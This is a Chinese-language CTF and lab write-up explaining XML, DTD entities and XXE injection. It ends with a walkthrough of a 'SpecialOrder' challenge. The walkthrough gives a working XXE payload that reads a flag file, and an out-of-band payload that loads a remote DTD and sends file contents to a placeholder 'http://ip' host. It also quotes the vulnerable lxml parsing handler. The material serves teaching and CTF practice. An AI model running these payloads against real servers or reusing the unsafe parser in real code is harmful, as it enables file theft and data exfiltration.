本文涉及知識點實操練習:XXE漏洞分析與實踐 (通過該實驗瞭解XXE漏洞的基礎知識及演示實踐。)
0x01.xxe漏洞
XXE漏洞全稱XML External Entity Injection即xml外部實體注入漏洞,XXE漏洞發生在應用程序解析XML輸入時,沒有禁止外部實體的加載,導致可加載惡意外部文件,造成文件讀取、命令執行、內網端口掃描、攻擊內網網站、發起dos攻擊等危害。xxe漏洞觸發的點往往是可以上傳xml文件的位置,沒有對上傳的xml文件進行過濾,導致可上傳惡意xml文件。
0x02.xml定義
XML由3個部分構成,它們分別是:文檔類型定義(Document Type Definition,DTD),即XML的佈局語言;可擴展的樣式語言(Extensible Style Language,XSL),即XML的樣式表語言;以及可擴展鏈接語言(Extensible Link Language,XLL)。
0x02.xml的作用
XML使用元素和屬性來描述數 據。在數據傳送過程中,XML始終保留了諸如父/子關係這樣的數據結構。幾個應用程序 可以共享和解析同一個XML文件,不必使用傳統的字符串解析或拆解過程。基本語法
- 所有 XML 元素都須有關閉標籤。
- XML 標籤對大小寫敏感。
- XML 必須正確地嵌套。
- XML 文檔必須有根元素。
- XML 的屬性值須加引號。
- 實體引用(在標籤屬性,以及對應的位置值可能會出現<>符號,但是這些符號在對應的XML中都是有特殊含義的,這時候我們必須使用對應html的實體對應的表示,比如<傅好對應的實體就是
<,>符號對應的實體就是>) - XML中的註釋,在XML中編寫註釋的語法與 HTML 的語法很相似。(
<!-- -->) - 在 XML 中,空格會被保留,多個空格不會被合併爲一個。
示例如下:
<?xml version="1.0" encoding="UTF-8"?>
<!-- ⬆XML聲明⬆ -->
<!DOCTYPE 文件名 [
<!ENTITY實體名 "實體內容">
]>
<!-- ⬆文檔類型定義(DTD)⬆ -->
<元素名稱 category="屬性">
文本或其他元素
</元素名稱>
<!-- ⬆文檔元素⬆ -->
0x03.xml格式說明
XML用於標記電子文件使其具有結構性的標記語言,可以用來標記數據、定義數據類型,是一種允許用戶對自己的標記語言進行定義的源語言。XML文檔結構包括XML聲明、DTD文檔類型定義(可選)、文檔元素。
<?xml version="1.0" encoding="utf-8" ?><!--xml聲明-->
<!DOCTYPE note [
<!ELEMENT note (to,from,heading,body)>
<!ELEMENT to (#PCDATA)>
<!ELEMENT from (#PCDATA)>
<!ELEMENT heading (#PCDATA)>
<!ELEMENT body (#PCDATA)>
]><!--文檔類型定義-->
<note>
<to>xxe</to>
<from>ljpm</from>
<heading>Text</heading>
<body>Only test!</body>
</note><!--文檔元素-->
0x04.DTD
文檔類型定義(DTD)可定義合法的XML文檔構建模塊。它使用一系列合法的元素來定義文檔的結構。DTD可被成行地聲明於XML文檔中,也可作爲一個外部引用。帶有DTD的XML文檔實例
1.外部DTD
<?xml version="1.0" encoding="utf-8" ?><!--xml聲明-->
<!DOCTYPE root-element SYSTEM "test.dtd">
<note>
<to>xxe</to>
<from>ljpm</from>
<heading>Text</heading>
<body>Only test!</body>
</note><!--文檔元素-->
test.dtd
<!ELEMENT to (#PCDATA)>
<!ELEMENT from (#PCDATA)>
<!ELEMENT heading (#PCDATA)>
<!ELEMENT body (#PCDATA)>
0x05.DTD數據類型
- PCDATA的意思是被解析的字符數據/
- PCDATA的意思是被解析的字符數據,PCDATA是會被解析器解析的文本
- CDATA的意思是字符數據
- CDATA是不會被解析器解析的文本,在這些文本中的標籤不會被當作標記來對待,其中的實體也不會被展開。
0x06.DTD實體介紹
1.內部實體
<?xml version="1.0" encoding="utf-8" ?><!--xml聲明-->
<!DOCTYPE note[
<!ELEMENT note (name,pwd)>
<!ENTITY name "admin">
<!ENTITY pwd "admin">
]>
<note>
<name>&name;</name>
<pwd>&pwd;</pwd>
</note><!--文檔元素-->
結果如下:
2.外部實體
<?xml version="1.0" encoding="utf-8" ?><!--xml聲明-->
<!DOCTYPE note[
<!ENTITY user SYSTEM "test.xml">
]>
<note>&user;</note><!--文檔元素-->
3.參數實體+外部實體
test.xml
<?xml version="1.0" encoding="utf-8" ?><!--xml聲明-->
<!DOCTYPE note [
<!ENTITY % user "admin">
<!ENTITY % pwd "admin">
<!ENTITY % ljpm SYSTEM "./dddd.dtd">
%ljpm;
]>
<note>&people;</note><!--文檔元素-->
dddd.dtd
<!ENTITY people "%user;%pwd;">
PS: %name(參數實體)是在DTD中被引用的,而&name;是在xml文檔中被引用的。XXE主要是利用了DTD引用外部實體導致的漏洞。
0x07.怎麼判斷網站是否存在XXE漏洞
最直接的方法就是用burp抓包,然後,修改HTTP請求方法,修改Content-Type頭部字段等等,查看返回包的響應,看看應用程序是否解析了發送的內容,一旦解析了,那麼有可能XXE攻擊漏洞。
0x08.示例如下:
1.實驗環境
SpecialOrder
2.分析
首頁登錄試驗環境將會被重定向到一個登錄界面:
環境有個註冊選項,我們先註冊一個用戶,然後登錄:
首頁的右上角有幾個路由,代表幾個功能,我們可以一一嘗試。在http://192.168.153.128:5000/create-post url下有一個類似於博客的提交框,可能存在存儲性的xss
嘗試了一下,不存在xss
在http://192.168.153.128:5000/customize 我們可以爲上面我們創建的帖子添加樣式:
添加樣式後的結果如下:
從上面的結果來看我們可以自定義帖子的css樣式參數:
* {
font-size: 51px;
color: red;
}
至於上面的51px;爲什麼不是50px;我也不知道QAQ。這個環境就只有兩個功能,上面那個發帖子的功能和這個修改樣式的功能,發帖子功能大概沒什麼bug,唯有這個修改樣式的比較可疑。我們可以通過burpsuite抓包分析一下。
發送的數據類型是Content-Type: application/json 。我們將其改成Content-Type: application/xml ,看看接不接受xml。
通過其返回沒有報錯,因此判斷是支持xml的,刷新一下頁面進一步驗證:
現在我們嘗試進行xml注入:
結果如下:
接下來就是讀取flag.txt文件(環境沒有添加flag.txt),最後的payload:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY file SYSTEM "file:///app/flag.txt">
]>
<root>
<color>&file;</color>
<size>40px</size>
</root>
0x09.Special Order pt2
0x41414141 CTF的一道題目該題是上一題的進化版(沒有環境),允許加載外部的dtd文件,因此payload如下:發送xml請求
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % file SYSTEM "file:///flag.txt">
<!ENTITY % xxe SYSTEM "http://ip/payload.dtd">
%xxe;
]>
<root>
<color>&send;</color>
<size>40px</size>
</root>
在我們的服務器上
<!ENTITY % all "<!ENTITY send SYSTEM 'http://ip/?%file;'>"> %all;
0x08環境中代碼有問題的部分
elif request.content_type == "application/xml" or request.content_type == "text/xml":
print(request.data)
parser = etree.XMLParser()
k = etree.fromstring(request.data, parser)
post_color = ""
post_size = ""
w = ""
for i in k.getchildren():
if i.tag == "color":
post_color = i.text
elif i.tag == "size":
post_size = i.text
if db.session.query(settings_map).filter_by(username=session['username']).first():
db.session.query(settings_map).filter_by(username=session['username']).update({"size": post_size, "color": post_color})
db.session.commit()
return "DONE :D"
else:
engine.execute(settings_table.insert(), username=session['username'], color=post_color, size=post_size)
return "DONE :D"
沒有過濾造成的。